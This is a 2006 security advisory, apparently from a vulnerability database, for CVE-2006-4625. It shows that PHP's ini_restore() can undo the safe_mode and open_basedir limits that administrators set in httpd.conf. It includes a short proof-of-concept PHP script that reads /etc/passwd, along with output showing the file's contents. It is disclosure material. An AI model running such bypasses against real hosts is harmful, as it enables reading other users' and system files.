Bug: PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore() ( Ascii Version )

Search:
WLB2

PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()

Published
Credit
Risk
2006.09.09
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
N/A
CVE-2006-4625
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
3.6/10
4.9/10
3.9/10
Exploit range
Attack complexity
Authentication
Local
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
None


[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]


Author: Maksymilian Arciemowicz
Date:
- - Written: 05.09.2006
- - Public: 09.09.2006
CVE: CVE-2006-4625
SecurityRisk: High
Affected Software: PHP 5.1.6 / 4.4.4 < = x
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique
PHP-specific
features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig S&#230;ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the
Zend website. Also, much
of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with
php_admin_value can
not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.
php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with
php_admin_flag
can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. php_admin_value and php_admin_flag Bypass ---
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache
configuration files (e.g.
httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.

For example:
open_basedir in httpd.conf

- ---
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
- ---

In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()

Example:
If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value,
you can restore
Master Value to Local Value per ini_restore() function!

- ---
ini_restore

(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option
- ---

Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.

EXPLOIT:
- ---
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
- ---

RESULT OF EXPLOIT:
- ---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed
path(s):
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-ag.....
- ---

This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.

- --- 2. How to fix ---
fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.

http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Contact ---
Author: Maksymilian Arciemowicz

References:

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01086137
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01056506
http://www.mandriva.com/security/advisories?name=MDKSA-2006:185
http://www.ubuntu.com/usn/usn-362-1

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version